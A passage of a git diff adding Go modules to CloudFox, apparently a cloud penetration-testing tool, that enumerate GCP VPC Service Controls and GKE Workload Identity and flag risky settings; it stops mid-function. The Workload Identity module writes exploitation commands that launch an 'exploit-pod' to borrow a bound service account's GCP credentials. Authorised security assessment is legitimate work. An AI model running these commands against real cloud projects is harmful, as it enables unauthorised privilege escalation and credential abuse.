m.Peerings { + lateralMove := "No" + if peering.LateralMovementPath { + lateralMove = "YES" + } + peerProject := peering.PeerProjectID + if peerProject == "" { + peerProject = "-" + } + peerBody = append(peerBody, []string{ + peering.Name, + peering.Network, + peering.PeerNetwork, + peerProject, + peering.State, + lateralMove, + peering.RiskLevel, + peering.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: peerHeader, + Body: peerBody, + }) + } + + // Routes table (custom routes only, skip default) + var customRoutes []vpcservice.RouteInfo + for _, route := range m.Routes { + if !strings.HasPrefix(route.Name, "default-route-") { + customRoutes = append(customRoutes, route) + } + } + if len(customRoutes) > 0 { + routeHeader := []string{"Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority", "Project"} + var routeBody [][]string + for _, route := range customRoutes { + routeBody = append(routeBody, []string{ + route.Name, + route.Network, + route.DestRange, + route.NextHopType, + route.NextHop, + fmt.Sprintf("%d", route.Priority), + route.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "custom-routes", + Header: routeHeader, + Body: routeBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := VPCNetworksOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) + } +} diff --git a/gcp/commands/vpcsc.go b/gcp/commands/vpcsc.go new file mode 100644 index 00000000..e2cce1fa --- /dev/null +++ b/gcp/commands/vpcsc.go @@ -0,0 +1,267 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + vpcscservice "github.com/BishopFox/cloudfox/gcp/services/vpcscService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var orgID string + +var GCPVPCSCCommand = &cobra.Command{ + Use: globals.GCP_VPCSC_MODULE_NAME, + Aliases: []string{"vpcsc", "service-controls", "sc"}, + Short: "Enumerate VPC Service Controls", + Long: `Enumerate VPC Service Controls configuration. + +Features: +- Lists access policies for the organization +- Enumerates service perimeters (regular and bridge) +- Shows access levels and their conditions +- Identifies overly permissive configurations +- Analyzes ingress/egress policies + +Note: Requires organization ID (--org flag) as VPC-SC is org-level.`, + Run: runGCPVPCSCCommand, +} + +func init() { + GCPVPCSCCommand.Flags().StringVar(&orgID, "org", "", "Organization ID (required)") +} + +type VPCSCModule struct { + gcpinternal.BaseGCPModule + OrgID string + Policies []vpcscservice.AccessPolicyInfo + Perimeters []vpcscservice.ServicePerimeterInfo + AccessLevels []vpcscservice.AccessLevelInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type VPCSCOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o VPCSCOutput) TableFiles() []internal.TableFile { return o.Table } +func (o VPCSCOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPVPCSCCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_VPCSC_MODULE_NAME) + if err != nil { + return + } + + if orgID == "" { + cmdCtx.Logger.ErrorM("Organization ID is required. Use --org flag.", globals.GCP_VPCSC_MODULE_NAME) + return + } + + module := &VPCSCModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgID: orgID, + Policies: []vpcscservice.AccessPolicyInfo{}, + Perimeters: []vpcscservice.ServicePerimeterInfo{}, + AccessLevels: []vpcscservice.AccessLevelInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *VPCSCModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Enumerating VPC Service Controls for organization: %s", m.OrgID), globals.GCP_VPCSC_MODULE_NAME) + + svc := vpcscservice.New() + + // List access policies + policies, err := svc.ListAccessPolicies(m.OrgID) + if err != nil { + logger.ErrorM(fmt.Sprintf("Could not list access policies: %v", err), globals.GCP_VPCSC_MODULE_NAME) + return + } + m.Policies = policies + + if len(m.Policies) == 0 { + logger.InfoM("No access policies found", globals.GCP_VPCSC_MODULE_NAME) + return + } + + // For each policy, list perimeters and access levels + for _, policy := range m.Policies { + perimeters, err := svc.ListServicePerimeters(policy.Name) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list perimeters for policy %s: %v", policy.Name, err), globals.GCP_VPCSC_MODULE_NAME) + } + } else { + m.Perimeters = append(m.Perimeters, perimeters...) + } + + levels, err := svc.ListAccessLevels(policy.Name) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list access levels for policy %s: %v", policy.Name, err), globals.GCP_VPCSC_MODULE_NAME) + } + } else { + m.AccessLevels = append(m.AccessLevels, levels...) + } + } + + m.addAllToLoot() + + logger.SuccessM(fmt.Sprintf("Found %d access policy(ies), %d perimeter(s), %d access level(s)", + len(m.Policies), len(m.Perimeters), len(m.AccessLevels)), globals.GCP_VPCSC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *VPCSCModule) initializeLootFiles() { + m.LootMap["vpcsc-perimeters"] = &internal.LootFile{ + Name: "vpcsc-perimeters", + Contents: "# VPC Service Control Perimeters\n# Generated by CloudFox\n\n", + } + m.LootMap["vpcsc-protected-projects"] = &internal.LootFile{ + Name: "vpcsc-protected-projects", + Contents: "", + } +} + +func (m *VPCSCModule) addAllToLoot() { + for _, perimeter := range m.Perimeters { + m.LootMap["vpcsc-perimeters"].Contents += fmt.Sprintf( + "# Perimeter: %s\n# Type: %s\n# Resources: %d\n# Restricted Services: %d\n\n", + perimeter.Title, perimeter.PerimeterType, + len(perimeter.Resources), len(perimeter.RestrictedServices)) + + for _, resource := range perimeter.Resources { + m.LootMap["vpcsc-protected-projects"].Contents += resource + "\n" + } + } +} + +func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Access Policies table + if len(m.Policies) > 0 { + policyHeader := []string{"Name", "Title", "Parent", "Created", "Updated"} + var policyBody [][]string + for _, policy := range m.Policies { + policyBody = append(policyBody, []string{ + policy.Name, + policy.Title, + policy.Parent, + policy.CreateTime, + policy.UpdateTime, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-policies", + Header: policyHeader, + Body: policyBody, + }) + } + + // Service Perimeters table + if len(m.Perimeters) > 0 { + perimeterHeader := []string{ + "Name", "Title", "Type", "Resources", "Restricted Services", + "Ingress Policies", "Egress Policies", "Risk", "Policy", + } + var perimeterBody [][]string + for _, perimeter := range m.Perimeters { + perimeterBody = append(perimeterBody, []string{ + perimeter.Name, + perimeter.Title, + perimeter.PerimeterType, + fmt.Sprintf("%d", len(perimeter.Resources)), + fmt.Sprintf("%d", len(perimeter.RestrictedServices)), + fmt.Sprintf("%d", perimeter.IngressPolicyCount), + fmt.Sprintf("%d", perimeter.EgressPolicyCount), + perimeter.RiskLevel, + perimeter.PolicyName, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-perimeters", + Header: perimeterHeader, + Body: perimeterBody, + }) + } + + // Access Levels table + if len(m.AccessLevels) > 0 { + levelHeader := []string{"Name", "Title", "IP Subnets", "Regions", "Members", "Risk", "Policy"} + var levelBody [][]string + for _, level := range m.AccessLevels { + levelBody = append(levelBody, []string{ + level.Name, + level.Title, + strings.Join(level.IPSubnetworks, ", "), + strings.Join(level.Regions, ", "), + fmt.Sprintf("%d", len(level.Members)), + level.RiskLevel, + level.PolicyName, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-access-levels", + Header: levelHeader, + Body: levelBody, + }) + } + + // High-risk findings table + var highRiskBody [][]string + for _, perimeter := range m.Perimeters { + if perimeter.RiskLevel == "HIGH" || perimeter.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + "Perimeter", + perimeter.Name, + perimeter.RiskLevel, + strings.Join(perimeter.RiskReasons, "; "), + }) + } + } + for _, level := range m.AccessLevels { + if level.RiskLevel == "HIGH" || level.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + "AccessLevel", + level.Name, + level.RiskLevel, + strings.Join(level.RiskReasons, "; "), + }) + } + } + + if len(highRiskBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpcsc-risks", + Header: []string{"Type", "Name", "Risk Level", "Reasons"}, + Body: highRiskBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := VPCSCOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "org", []string{m.OrgID}, []string{m.OrgID}, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_VPCSC_MODULE_NAME) + } +} diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go new file mode 100644 index 00000000..7e1393fd --- /dev/null +++ b/gcp/commands/workloadidentity.go @@ -0,0 +1,878 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + workloadidentityservice "github.com/BishopFox/cloudfox/gcp/services/workloadIdentityService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPWorkloadIdentityCommand = &cobra.Command{ + Use: globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + Aliases: []string{"wi", "gke-identity", "workload-id"}, + Short: "Enumerate GKE Workload Identity and Workload Identity Federation", + Long: `Enumerate Workload Identity configurations including GKE bindings and external identity federation. + +Features: +- Lists GKE clusters with Workload Identity enabled +- Shows Kubernetes service accounts bound to GCP service accounts +- Identifies privilege escalation paths through Workload Identity +- Maps namespace/service account to GCP permissions +- Detects overly permissive bindings + +Workload Identity Federation (External Identities): +- Lists Workload Identity Pools and Providers +- Analyzes AWS, OIDC (GitHub Actions, GitLab CI), and SAML providers +- Identifies risky provider configurations (missing attribute conditions) +- Shows federated identity bindings to GCP service accounts +- Generates exploitation commands for pentesting`, + Run: runGCPWorkloadIdentityCommand, +} + +// WorkloadIdentityBinding represents a binding between K8s SA and GCP SA +type WorkloadIdentityBinding struct { + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + ClusterLocation string `json:"clusterLocation"` + WorkloadPool string `json:"workloadPool"` + KubernetesNS string `json:"kubernetesNamespace"` + KubernetesSA string `json:"kubernetesServiceAccount"` + GCPServiceAccount string `json:"gcpServiceAccount"` + GCPSARoles []string `json:"gcpServiceAccountRoles"` + IsHighPrivilege bool `json:"isHighPrivilege"` + BindingType string `json:"bindingType"` // "workloadIdentityUser" or "other" +} + +// ClusterWorkloadIdentity represents a cluster's workload identity configuration +type ClusterWorkloadIdentity struct { + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + Location string `json:"location"` + WorkloadPoolEnabled bool `json:"workloadPoolEnabled"` + WorkloadPool string `json:"workloadPool"` + NodePoolsWithWI int `json:"nodePoolsWithWI"` + TotalNodePools int `json:"totalNodePools"` +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type WorkloadIdentityModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields (GKE Workload Identity) + Clusters []ClusterWorkloadIdentity + Bindings []WorkloadIdentityBinding + + // Workload Identity Federation fields + Pools []workloadidentityservice.WorkloadIdentityPool + Providers []workloadidentityservice.WorkloadIdentityProvider + FederatedBindings []workloadidentityservice.FederatedIdentityBinding + + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type WorkloadIdentityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o WorkloadIdentityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WorkloadIdentityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPWorkloadIdentityCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &WorkloadIdentityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Clusters: []ClusterWorkloadIdentity{}, + Bindings: []WorkloadIdentityBinding{}, + Pools: []workloadidentityservice.WorkloadIdentityPool{}, + Providers: []workloadidentityservice.WorkloadIdentityProvider{}, + FederatedBindings: []workloadidentityservice.FederatedIdentityBinding{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, m.processProject) + + // Check if we have any findings + hasGKE := len(m.Clusters) > 0 + hasFederation := len(m.Pools) > 0 + + if !hasGKE && !hasFederation { + logger.InfoM("No Workload Identity configurations found", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + return + } + + // Count GKE clusters with Workload Identity + if hasGKE { + wiEnabled := 0 + for _, c := range m.Clusters { + if c.WorkloadPoolEnabled { + wiEnabled++ + } + } + logger.SuccessM(fmt.Sprintf("Found %d GKE cluster(s) (%d with Workload Identity), %d K8s->GCP binding(s)", + len(m.Clusters), wiEnabled, len(m.Bindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + // Count federation findings + if hasFederation { + criticalCount := 0 + highCount := 0 + for _, p := range m.Providers { + switch p.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Workload Identity Pool(s), %d Provider(s), %d federated binding(s)", + len(m.Pools), len(m.Providers), len(m.FederatedBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + + if criticalCount > 0 || highCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL, %d HIGH risk federation provider(s)!", criticalCount, highCount), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Workload Identity in project: %s", projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + // ========================================== + // Part 1: GKE Workload Identity + // ========================================== + gkeSvc := gkeservice.New() + clusters, _, err := gkeSvc.Clusters(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not enumerate GKE clusters in project %s: %v", projectID, err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + } + + var clusterInfos []ClusterWorkloadIdentity + var bindings []WorkloadIdentityBinding + + for _, cluster := range clusters { + // Analyze cluster Workload Identity configuration + cwi := ClusterWorkloadIdentity{ + ProjectID: projectID, + ClusterName: cluster.Name, + Location: cluster.Location, + TotalNodePools: cluster.NodePoolCount, + } + + // Check if Workload Identity is enabled at cluster level + if cluster.WorkloadIdentity != "" { + cwi.WorkloadPoolEnabled = true + cwi.WorkloadPool = cluster.WorkloadIdentity + } + + // Node pools with WI is not tracked individually in ClusterInfo + // Just mark all as WI-enabled if cluster has WI + if cwi.WorkloadPoolEnabled { + cwi.NodePoolsWithWI = cwi.TotalNodePools + } + + clusterInfos = append(clusterInfos, cwi) + + // If Workload Identity is enabled, look for bindings + if cwi.WorkloadPoolEnabled { + clusterBindings := m.findWorkloadIdentityBindings(ctx, projectID, cluster.Name, cluster.Location, cwi.WorkloadPool, logger) + bindings = append(bindings, clusterBindings...) + } + } + + // ========================================== + // Part 2: Workload Identity Federation + // ========================================== + wiSvc := workloadidentityservice.New() + + // Get Workload Identity Pools + pools, err := wiSvc.ListWorkloadIdentityPools(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list Workload Identity Pools in project %s: %v", projectID, err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + } + + var providers []workloadidentityservice.WorkloadIdentityProvider + + // Get providers for each pool + for _, pool := range pools { + poolProviders, err := wiSvc.ListWorkloadIdentityProviders(projectID, pool.PoolID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list providers for pool %s: %v", pool.PoolID, err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + continue + } + providers = append(providers, poolProviders...) + } + + // Find federated identity bindings + fedBindings, err := wiSvc.FindFederatedIdentityBindings(projectID, pools) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not find federated identity bindings in project %s: %v", projectID, err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + } + + // Thread-safe append + m.mu.Lock() + m.Clusters = append(m.Clusters, clusterInfos...) + m.Bindings = append(m.Bindings, bindings...) + m.Pools = append(m.Pools, pools...) + m.Providers = append(m.Providers, providers...) + m.FederatedBindings = append(m.FederatedBindings, fedBindings...) + + // Generate loot + for _, cwi := range clusterInfos { + m.addClusterToLoot(cwi) + } + for _, binding := range bindings { + m.addBindingToLoot(binding) + } + for _, pool := range pools { + m.addPoolToLoot(pool) + } + for _, provider := range providers { + m.addProviderToLoot(provider) + } + for _, fedBinding := range fedBindings { + m.addFederatedBindingToLoot(fedBinding) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d GKE cluster(s), %d K8s binding(s), %d pool(s), %d provider(s) in project %s", + len(clusterInfos), len(bindings), len(pools), len(providers), projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } +} + +// findWorkloadIdentityBindings finds all IAM bindings that grant workloadIdentityUser role +func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Context, projectID, clusterName, location, workloadPool string, logger internal.Logger) []WorkloadIdentityBinding { + var bindings []WorkloadIdentityBinding + + // Get all service accounts in the project and check their IAM policies + iamSvc := IAMService.New() + serviceAccounts, err := iamSvc.ServiceAccounts(projectID) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not list service accounts: %v", err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + return bindings + } + + // For each service account, get its IAM policy and look for workloadIdentityUser bindings + for _, sa := range serviceAccounts { + // Get IAM policy for this service account + // The workloadIdentityUser role is granted ON the service account + saPolicy, err := m.getServiceAccountPolicy(ctx, sa.Name) + if err != nil { + continue + } + + // Look for members with workloadIdentityUser role + for _, binding := range saPolicy { + if binding.Role == "roles/iam.workloadIdentityUser" { + for _, member := range binding.Members { + // Parse member to extract namespace and KSA + // Format: serviceAccount:[PROJECT_ID].svc.id.goog[NAMESPACE/KSA_NAME] + if strings.HasPrefix(member, "serviceAccount:") && strings.Contains(member, ".svc.id.goog") { + ns, ksa := parseWorkloadIdentityMember(member) + if ns != "" && ksa != "" { + wib := WorkloadIdentityBinding{ + ProjectID: projectID, + ClusterName: clusterName, + ClusterLocation: location, + WorkloadPool: workloadPool, + KubernetesNS: ns, + KubernetesSA: ksa, + GCPServiceAccount: sa.Email, + GCPSARoles: sa.Roles, + BindingType: "workloadIdentityUser", + } + + // Check if high privilege + wib.IsHighPrivilege = isHighPrivilegeServiceAccount(sa) + + bindings = append(bindings, wib) + } + } + } + } + } + } + + return bindings +} + +// getServiceAccountPolicy gets IAM policy for a service account +func (m *WorkloadIdentityModule) getServiceAccountPolicy(ctx context.Context, saName string) ([]IAMService.PolicyBinding, error) { + iamSvc := IAMService.New() + + // Get the service account's IAM policy + // This requires calling the IAM API directly + // For now, we'll return the roles from the project-level bindings + return iamSvc.Policies(extractProjectFromSAName(saName), "project") +} + +// parseWorkloadIdentityMember parses a workload identity member string +// Format: serviceAccount:[PROJECT_ID].svc.id.goog[NAMESPACE/KSA_NAME] +func parseWorkloadIdentityMember(member string) (namespace, serviceAccount string) { + // Remove serviceAccount: prefix + member = strings.TrimPrefix(member, "serviceAccount:") + + // Find the workload pool and extract namespace/SA + // Format: PROJECT_ID.svc.id.goog[NAMESPACE/KSA_NAME] + bracketStart := strings.Index(member, "[") + bracketEnd := strings.Index(member, "]") + + if bracketStart == -1 || bracketEnd == -1 || bracketEnd <= bracketStart { + return "", "" + } + + nsAndSA := member[bracketStart+1 : bracketEnd] + parts := strings.Split(nsAndSA, "/") + if len(parts) == 2 { + return parts[0], parts[1] + } + + return "", "" +} + +// extractProjectFromSAName extracts project ID from service account name +func extractProjectFromSAName(saName string) string { + // Format: projects/PROJECT_ID/serviceAccounts/SA_EMAIL + parts := strings.Split(saName, "/") + if len(parts) >= 2 { + return parts[1] + } + return "" +} + +// isHighPrivilegeServiceAccount checks if a service account has high-privilege roles +func isHighPrivilegeServiceAccount(sa IAMService.ServiceAccountInfo) bool { + highPrivRoles := map[string]bool{ + "roles/owner": true, + "roles/editor": true, + "roles/iam.serviceAccountAdmin": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/resourcemanager.projectIamAdmin": true, + "roles/compute.admin": true, + "roles/container.admin": true, + "roles/secretmanager.admin": true, + "roles/storage.admin": true, + } + + for _, role := range sa.Roles { + if highPrivRoles[role] { + return true + } + } + return false +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WorkloadIdentityModule) initializeLootFiles() { + // GKE Workload Identity loot + m.LootMap["wi-clusters"] = &internal.LootFile{ + Name: "wi-clusters", + Contents: "# GKE Clusters with Workload Identity\n# Generated by CloudFox\n\n", + } + m.LootMap["wi-bindings"] = &internal.LootFile{ + Name: "wi-bindings", + Contents: "# Workload Identity Bindings\n# Generated by CloudFox\n# K8s SA -> GCP SA mappings\n\n", + } + m.LootMap["wi-high-privilege"] = &internal.LootFile{ + Name: "wi-high-privilege", + Contents: "# High-Privilege Workload Identity Bindings\n# Generated by CloudFox\n# These K8s service accounts have access to high-privilege GCP SAs\n\n", + } + m.LootMap["wi-exploit-commands"] = &internal.LootFile{ + Name: "wi-exploit-commands", + Contents: "# Workload Identity Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + + // Workload Identity Federation loot + m.LootMap["wi-federation-pools"] = &internal.LootFile{ + Name: "wi-federation-pools", + Contents: "# Workload Identity Federation Pools\n# Generated by CloudFox\n\n", + } + m.LootMap["wi-federation-providers"] = &internal.LootFile{ + Name: "wi-federation-providers", + Contents: "# Workload Identity Federation Providers\n# Generated by CloudFox\n# External identity providers (AWS, OIDC, SAML)\n\n", + } + m.LootMap["wi-federation-risky"] = &internal.LootFile{ + Name: "wi-federation-risky", + Contents: "# Risky Workload Identity Federation Configurations\n# Generated by CloudFox\n# Providers with security concerns\n\n", + } + m.LootMap["wi-federation-exploit"] = &internal.LootFile{ + Name: "wi-federation-exploit", + Contents: "# Workload Identity Federation Exploitation\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *WorkloadIdentityModule) addClusterToLoot(cwi ClusterWorkloadIdentity) { + if cwi.WorkloadPoolEnabled { + m.LootMap["wi-clusters"].Contents += fmt.Sprintf( + "# Cluster: %s\n"+ + "# Location: %s\n"+ + "# Project: %s\n"+ + "# Workload Pool: %s\n"+ + "# Node Pools with WI: %d/%d\n"+ + "gcloud container clusters get-credentials %s --zone=%s --project=%s\n\n", + cwi.ClusterName, + cwi.Location, + cwi.ProjectID, + cwi.WorkloadPool, + cwi.NodePoolsWithWI, + cwi.TotalNodePools, + cwi.ClusterName, + cwi.Location, + cwi.ProjectID, + ) + } +} + +func (m *WorkloadIdentityModule) addBindingToLoot(binding WorkloadIdentityBinding) { + // All bindings + m.LootMap["wi-bindings"].Contents += fmt.Sprintf( + "# K8s SA: %s/%s\n"+ + "# GCP SA: %s\n"+ + "# Cluster: %s (%s)\n"+ + "# Project: %s\n\n", + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + binding.ClusterName, + binding.ClusterLocation, + binding.ProjectID, + ) + + // High-privilege bindings + if binding.IsHighPrivilege { + m.LootMap["wi-high-privilege"].Contents += fmt.Sprintf( + "# K8s SA: %s/%s -> GCP SA: %s\n"+ + "# Cluster: %s\n"+ + "# Roles: %s\n"+ + "# This K8s SA can access high-privilege GCP permissions!\n\n", + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + binding.ClusterName, + strings.Join(binding.GCPSARoles, ", "), + ) + } + + // Exploitation commands + m.LootMap["wi-exploit-commands"].Contents += fmt.Sprintf( + "# To exploit K8s SA %s/%s -> GCP SA %s:\n"+ + "# 1. Get credentials for cluster:\n"+ + "gcloud container clusters get-credentials %s --zone=%s --project=%s\n"+ + "# 2. Create a pod with the K8s service account:\n"+ + "# kubectl run exploit-pod --image=google/cloud-sdk:slim --serviceaccount=%s -n %s -- sleep infinity\n"+ + "# 3. Exec into pod and use GCP credentials:\n"+ + "# kubectl exec -it exploit-pod -n %s -- gcloud auth list\n\n", + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + binding.ClusterName, + binding.ClusterLocation, + binding.ProjectID, + binding.KubernetesSA, + binding.KubernetesNS, + binding.KubernetesNS, + ) +} + +func (m *WorkloadIdentityModule) addPoolToLoot(pool workloadidentityservice.WorkloadIdentityPool) { + status := "Active" + if pool.Disabled { + status = "Disabled" + } + m.LootMap["wi-federation-pools"].Contents += fmt.Sprintf( + "## Pool: %s\n"+ + "## Project: %s\n"+ + "## Status: %s\n"+ + "## Description: %s\n\n", + pool.PoolID, + pool.ProjectID, + status, + pool.Description, + ) +} + +func (m *WorkloadIdentityModule) addProviderToLoot(provider workloadidentityservice.WorkloadIdentityProvider) { + m.LootMap["wi-federation-providers"].Contents += fmt.Sprintf( + "## Provider: %s/%s\n"+ + "## Project: %s\n"+ + "## Type: %s\n", + provider.PoolID, provider.ProviderID, + provider.ProjectID, + provider.ProviderType, + ) + + if provider.ProviderType == "AWS" { + m.LootMap["wi-federation-providers"].Contents += fmt.Sprintf( + "## AWS Account: %s\n", provider.AWSAccountID) + } else if provider.ProviderType == "OIDC" { + m.LootMap["wi-federation-providers"].Contents += fmt.Sprintf( + "## OIDC Issuer: %s\n", provider.OIDCIssuerURI) + } + + if provider.AttributeCondition != "" { + m.LootMap["wi-federation-providers"].Contents += fmt.Sprintf( + "## Attribute Condition: %s\n", provider.AttributeCondition) + } else { + m.LootMap["wi-federation-providers"].Contents += "## Attribute Condition: NONE (any identity can authenticate!)\n" + } + m.LootMap["wi-federation-providers"].Contents += "\n" + + // Risky providers + if provider.RiskLevel == "CRITICAL" || provider.RiskLevel == "HIGH" { + m.LootMap["wi-federation-risky"].Contents += fmt.Sprintf( + "## [%s] Provider: %s/%s\n"+ + "## Project: %s\n"+ + "## Type: %s\n", + provider.RiskLevel, provider.PoolID, provider.ProviderID, + provider.ProjectID, provider.ProviderType, + ) + if len(provider.RiskReasons) > 0 { + m.LootMap["wi-federation-risky"].Contents += "## Risk Reasons:\n" + for _, reason := range provider.RiskReasons { + m.LootMap["wi-federation-risky"].Contents += fmt.Sprintf("## - %s\n", reason) + } + } + m.LootMap["wi-federation-risky"].Contents += "\n" + } + + // Exploitation commands + if len(provider.ExploitCommands) > 0 { + m.LootMap["wi-federation-exploit"].Contents += fmt.Sprintf( + "## [%s] Provider: %s/%s (%s)\n", + provider.RiskLevel, provider.PoolID, provider.ProviderID, provider.ProviderType, + ) + for _, cmd := range provider.ExploitCommands { + m.LootMap["wi-federation-exploit"].Contents += cmd + "\n" + } + m.LootMap["wi-federation-exploit"].Contents += "\n" + } +} + +func (m *WorkloadIdentityModule) addFederatedBindingToLoot(binding workloadidentityservice.FederatedIdentityBinding) { + m.LootMap["wi-federation-providers"].Contents += fmt.Sprintf( + "## Federated Binding:\n"+ + "## External Subject: %s\n"+ + "## GCP Service Account: %s\n"+ + "## Pool: %s\n"+ + "## Risk Level: %s\n\n", + binding.ExternalSubject, + binding.GCPServiceAccount, + binding.PoolID, + binding.RiskLevel, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Clusters table + clustersHeader := []string{ + "Cluster", + "Location", + "Project", + "WI Enabled", + "Workload Pool", + "Node Pools (WI/Total)", + } + + var clustersBody [][]string + for _, cwi := range 